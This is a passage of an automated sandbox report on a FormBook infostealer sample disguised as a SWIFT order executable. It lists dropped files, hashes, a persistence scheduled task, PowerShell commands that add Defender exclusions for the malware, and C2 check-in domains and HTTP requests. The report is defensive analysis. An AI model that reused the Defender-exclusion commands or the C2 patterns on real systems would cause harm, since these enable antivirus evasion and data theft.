SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
Process: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
File Type: XML 1.0 document, ASCII text
Category: modified
Size (bytes): 1598
Entropy (8bit): 5.127424622971062
Encrypted: false
SSDEEP: 24:2di4+S2qh/a1Kby1moqUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt2Kxvn:cgeCaYrFdOFzOzN33ODOiDdKrsuT3v
MD5: 073226D0EFA0A26416EDDC6944D51BCC
SHA1: 38A3F2287EE0FEF6BCD822073F86465BC07A0410
SHA-256: 72B3E02ACCA5893BA29C7A20D4A175DCD624EB47A5CF4EB5EC7281CA527209BF
SHA-512: B4C4451521729895619F73628547E570EAD1C4C55B6307DF6CFC0F798888817A93324C99624C5732FAB96124CAC53B5A4A61A5C320B43D40E527442238064D1D
Malicious: true
Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
C:\Users\user\AppData\Roaming\AnsPejV.exe
Process: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 669184
Entropy (8bit): 7.7026776844711975
Encrypted: false
SSDEEP: 12288:vCs0Vr2RpOtM9jWo4jS49MAr38GIXixBFm7XWABfGlW:qs0VCRgtMYo4jbMAr3MXi1DgfGw
MD5: FFF91C58119D3CD7F68457E8565F7116
SHA1: 4201EB7214BD3658889739E4856412B8063E0405
SHA-256: F8C0D385ECE89CD926B2C74680C036F9927414955E7FF4ED12B576470B8C1745
SHA-512: C05CF9E0ED2AAD4C08B394D97FC1257D273AA8DD51A45487BA51FF5973AB7B2227ABA7EA1E1E8E9DAF7416AAEA418B06EDFA29FF93665F6D3CC5B1A392DBED92
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 36%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.a..............0......~......J.... ........@.. ....................................@.....................................O........z...................`....................................................... ............... ..H............text...`.... ...................... ..`.rsrc....z.......|..................@..@.reloc.......`.......4..............@..B................,.......H........e...u..............8.............................................{ ...*..{!...*..{"...*..{#...*..($.....} .....}!.....}"......}#...*....0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o*...,.(+....{#....{#...o,...+..+..*..0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X*...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....
C:\Users\user\AppData\Roaming\AnsPejV.exe:Zone.Identifier
Process: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: false
Preview: [ZoneTransfer]....ZoneId=0
C:\Users\user\Documents\20211125\PowerShell_transcript.767668.c7I805VN.20211125173008.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 3604
Entropy (8bit): 5.347973336216193
Encrypted: false
SSDEEP: 96:BZL/UN04qDo1ZsB8Z1/UN04qDo1Z4qYbq0cbq0cbq0mZl:Zyy1
MD5: 8AE9A22691D773B86900B6325C03EC43
SHA1: E80D83E1253AB678CA43BAA3085013D08A937D1E
SHA-256: 0A7BCD43B7E1DC35C193F4A4F5E5D63763FBC98B088E8914440ACBB81C0313E7
SHA-512: 56055C291F0B6D1621101AEEB6670D5D2821E4E4090BC1441D92B556BD3368813F5860E33E8AAEFD0209397B72990B0B925D2EF04685DE91AFAA332057821095
Malicious: false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125173011..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 767668 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe..Process ID: 2540..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125173011..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe..**********************..Command start time: 20211125173252..**********************..PS>TerminatingErro
C:\Users\user\Documents\20211125\PowerShell_transcript.767668.vc7f5t7q.20211125173011.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 5787
Entropy (8bit): 5.375979082304954
Encrypted: false
SSDEEP: 96:BZu/UNqqDo1Z9Zcd/UNqqDo1ZIEq8jZ9/UNqqDo1Z7lMMnZ0:NU
MD5: C0C13A582E37634B29E0F4BC6F44BA47
SHA1: 397AFD879056F2B3E24F5C096AA34FCF841B5AAA
SHA-256: 7B9B0E595B666EF88EC3BD1DB118A3E00341E7EE4085A44236BEC3C19237B1C3
SHA-512: 8C84FCB1431A7F5B56732D76A5CB456104027C84B8EE253C90193111A3401EDAB84630850DC0227F96B6568D7170A94A5BAC40D5B2C64224D4187D82A295E6D8
Malicious: false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125173012..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 767668 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\AnsPejV.exe..Process ID: 6252..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125173012..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\AnsPejV.exe..**********************..Windows PowerShell transcript start..Start time: 20211125173403..Username: computer\user..RunAs User: computer\alfon

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.7026776844711975
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:TT_SWIFT_Export Order_noref S10SMG00318021.exe
                                                          File size:669184
                                                          MD5:fff91c58119d3cd7f68457e8565f7116
                                                          SHA1:4201eb7214bd3658889739e4856412b8063e0405
                                                          SHA256:f8c0d385ece89cd926b2c74680c036f9927414955e7ff4ed12b576470b8c1745
                                                          SHA512:c05cf9e0ed2aad4c08b394d97fc1257d273aa8dd51a45487ba51ff5973ab7b2227aba7ea1e1e8e9daf7416aaea418b06edfa29ff93665f6d3cc5b1a392dbed92
                                                          SSDEEP:12288:vCs0Vr2RpOtM9jWo4jS49MAr38GIXixBFm7XWABfGlW:qs0VCRgtMYo4jbMAr3MXi1DgfGw
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.a..............0......~......J.... ........@.. ....................................@................................

                                                          File Icon

                                                          Icon Hash:b296d2c2a2868682

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x46d44a
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x619F45FB [Thu Nov 25 08:14:51 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:v4.0.30319
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [ebp+0800000Eh], ch

                                                          Data Directories

                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6d3f8 | 0x4f | .text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6e000 | 0x37a0c | .rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa6000 | 0xc | .reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                          Sections

                                                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                          .text | 0x2000 | 0x6b460 | 0x6b600 | False | 0.883576469732 | data | 7.85893644673 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .rsrc | 0x6e000 | 0x37a0c | 0x37c00 | False | 0.510505710482 | data | 7.05663977483 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc | 0xa6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          Name | RVA | Size | Type | Language | Country
                                                          RT_ICON | 0x6e2b0 | 0xf9ee | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
                                                          RT_ICON | 0x7dca0 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 1510015233, next used block 1359020289 | |
                                                          RT_ICON | 0x8e4c8 | 0x94a8 | data | |
                                                          RT_ICON | 0x97970 | 0x5488 | data | |
                                                          RT_ICON | 0x9cdf8 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 16777216 | |
                                                          RT_ICON | 0xa1020 | 0x25a8 | data | |
                                                          RT_ICON | 0xa35c8 | 0x10a8 | data | |
                                                          RT_ICON | 0xa4670 | 0x988 | data | |
                                                          RT_ICON | 0xa4ff8 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                                          RT_GROUP_ICON | 0xa5460 | 0x84 | data | |
                                                          RT_VERSION | 0xa54e4 | 0x33c | data | |
                                                          RT_MANIFEST | 0xa5820 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                          Imports

                                                          DLL | Import
                                                          mscoree.dll | _CorExeMain

                                                          Version Infos

                                                          Description | Data
                                                          Translation | 0x0000 0x04b0
                                                          LegalCopyright | Copyright Rogers Peet
                                                          Assembly Version | 8.0.6.0
                                                          InternalName | UTF8Encodi.exe
                                                          FileVersion | 5.6.0.0
                                                          CompanyName | Rogers Peet
                                                          LegalTrademarks |
                                                          Comments |
                                                          ProductName | Biblan
                                                          ProductVersion | 5.6.0.0
                                                          FileDescription | Biblan
                                                          OriginalFilename | UTF8Encodi.exe

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                          11/25/21-17:31:51.368314 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49783 | 23.227.38.74 | 192.168.2.5
                                                          11/25/21-17:31:56.587015 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49784 | 34.102.136.180 | 192.168.2.5
                                                          11/25/21-17:32:15.930041 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49823 | 80 | 192.168.2.5 | 154.196.11.204
                                                          11/25/21-17:32:15.930041 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49823 | 80 | 192.168.2.5 | 154.196.11.204
                                                          11/25/21-17:32:15.930041 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49823 | 80 | 192.168.2.5 | 154.196.11.204

                                                          Network Port Distribution

                                                          TCP Packets


                                                          UDP Packets


                                                          DNS Queries

                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                          Nov 25, 2021 17:31:29.427968979 CET | 192.168.2.5 | 8.8.8.8 | 0xeb06 | Standard query (0) | www.innovativepropsolutions.com | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:31:34.520800114 CET | 192.168.2.5 | 8.8.8.8 | 0x15ee | Standard query (0) | www.754711.com | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:31:40.000199080 CET | 192.168.2.5 | 8.8.8.8 | 0x3c56 | Standard query (0) | www.blueharepress.com | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:31:45.217300892 CET | 192.168.2.5 | 8.8.8.8 | 0x4666 | Standard query (0) | www.wamhsh.com | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:31:51.231298923 CET | 192.168.2.5 | 8.8.8.8 | 0x2508 | Standard query (0) | www.pyjama-france.com | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:31:56.375845909 CET | 192.168.2.5 | 8.8.8.8 | 0x6adf | Standard query (0) | www.hpsaddlerock.com | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:32:01.617950916 CET | 192.168.2.5 | 8.8.8.8 | 0xfae3 | Standard query (0) | www.aarondecker.online | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:32:10.031330109 CET | 192.168.2.5 | 8.8.8.8 | 0x2679 | Standard query (0) | www.elderlycareacademy.com | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:32:15.327850103 CET | 192.168.2.5 | 8.8.8.8 | 0x5cd4 | Standard query (0) | www.oki-net.com | A (IP address) | IN (0x0001)

                                                          DNS Answers

                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                          Nov 25, 2021 17:31:29.496268988 CET | 8.8.8.8 | 192.168.2.5 | 0xeb06 | Name error (3) | www.innovativepropsolutions.com | none | none | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:31:34.980089903 CET | 8.8.8.8 | 192.168.2.5 | 0x15ee | Name error (3) | www.754711.com | none | none | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:31:40.160962105 CET | 8.8.8.8 | 192.168.2.5 | 0x3c56 | Name error (3) | www.blueharepress.com | none | none | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:31:45.712985039 CET | 8.8.8.8 | 192.168.2.5 | 0x4666 | No error (0) | www.wamhsh.com | | 156.226.250.165 | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:31:51.293879032 CET | 8.8.8.8 | 192.168.2.5 | 0x2508 | No error (0) | www.pyjama-france.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Nov 25, 2021 17:31:51.293879032 CET | 8.8.8.8 | 192.168.2.5 | 0x2508 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:31:56.445342064 CET | 8.8.8.8 | 192.168.2.5 | 0x6adf | No error (0) | www.hpsaddlerock.com | hpsaddlerock.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Nov 25, 2021 17:31:56.445342064 CET | 8.8.8.8 | 192.168.2.5 | 0x6adf | No error (0) | hpsaddlerock.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:32:01.762604952 CET | 8.8.8.8 | 192.168.2.5 | 0xfae3 | No error (0) | www.aarondecker.online | | 209.17.116.163 | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:32:10.249469995 CET | 8.8.8.8 | 192.168.2.5 | 0x2679 | No error (0) | www.elderlycareacademy.com | webredir.vip.gandi.net | | CNAME (Canonical name) | IN (0x0001)
                                                          Nov 25, 2021 17:32:10.249469995 CET | 8.8.8.8 | 192.168.2.5 | 0x2679 | No error (0) | webredir.vip.gandi.net | | 217.70.184.50 | A (IP address) | IN (0x0001)
                                                          Nov 25, 2021 17:32:15.544023991 CET | 8.8.8.8 | 192.168.2.5 | 0x5cd4 | No error (0) | www.oki-net.com | | 154.196.11.204 | A (IP address) | IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • www.wamhsh.com
                                                          • www.pyjama-france.com
                                                          • www.hpsaddlerock.com
                                                          • www.aarondecker.online

                                                          HTTP Packets

                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          0 | 192.168.2.5 | 49782 | 156.226.250.165 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Nov 25, 2021 17:31:45.965542078 CET | 7494 | OUT | GET /46uq/?3fQ0Khi=Ue3PnYf+WtitO9Jkut75Ma3k2TKhCZznjjMu1kid5hA29ktIECD3KZ7svhzldzsG+GSp&j0=SFN8Rxuh3 HTTP/1.1
                                                          Host: www.wamhsh.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Nov 25, 2021 17:31:46.210633039 CET7495INHTTP/1.1 404 Not Found
                                                          Date: Thu, 25 Nov 2021 16:31:46 GMT
                                                          Server: Apache
                                                          Content-Length: 260
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 77 61 6d 68 73 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.wamhsh.com Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49783 | 23.227.38.74 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 17:31:51.314028978 CET | 7496 | OUT | GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=KgIlRYVH25tNYqbEG8kO4R44bHZw5lHi55V8k/E4GGeqoND16iqE+SGGf+ZfndkYvzRB HTTP/1.1
Host: www.pyjama-france.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 25, 2021 17:31:51.368314028 CET | 7497 | IN | HTTP/1.1 403 Forbidden
Date: Thu, 25 Nov 2021 16:31:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Sorting-Hat-PodId: 183
X-Sorting-Hat-ShopId: 51998097592
X-Request-ID: dbaee5ab-3952-40fa-97f1-8e4299a03f3a
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 1; mode=block
X-Dc: gcp-europe-west1
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 6b3c4509ccd05b7a-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49784 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 17:31:56.469037056 CET | 7503 | OUT | GET /46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3 HTTP/1.1
Host: www.hpsaddlerock.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 25, 2021 17:31:56.587014914 CET | 7504 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 25 Nov 2021 16:31:56 GMT
Content-Type: text/html
Content-Length: 275
ETag: "618be761-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
